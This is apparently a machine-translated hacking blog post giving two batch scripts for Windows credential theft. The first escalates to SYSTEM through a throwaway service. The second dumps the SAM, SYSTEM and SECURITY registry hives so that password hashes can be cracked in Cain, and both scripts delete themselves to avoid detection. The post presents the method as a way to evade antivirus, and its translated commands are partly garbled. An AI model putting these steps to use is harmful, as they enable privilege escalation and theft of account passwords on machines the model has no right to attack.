Export the system registry to capture the Hash

I saw an article about exporting the Registry to break the password forever. This is a good news for a lot of hash-grabbing tools that have been killed and won't be killed by yourself, in fact, this was a long time ago. It seems that it was proposed by a foreigner, but it did not attract attention.

The author said that this method is not kill:

Windows 2000 SP4 (admin) = access denied
Windows XP SP2 (admin) = access denied
Windows XP SP3 (admin) = access denied
Windows 2003 R2 SP2 (admin) = works
Windows Vista SP2 (UAC/admin) = works
Windows 2008 SP1 (admin) = works
Windows 7 (UAC/admin) = works

There are requirements on user permissions. By default, XP SP3 cannot be exported. I tested it locally, but the system permission is acceptable. Then we can create a CMD with the system permission to run, and then export it.

You have not tested other systems.

First, create a CMD for executing the system permission:

================================== StartSystemCmd. bat ==========

SC Create systemcmd binPath = "cmd/K start" type = own type = interact
SC start systemcmd
SC delete systemcmd
Del % 0

========================================================== ==========

Then export the file.

========================== SaveReg. bat ====================================

@ Echo off
Reg save hklmsam sam. hive
Reg save hklmsystem system. hive
Reg save hklmsecurity security. hive
Del % 0

============================================================ ============

And then pour it into the CAIN.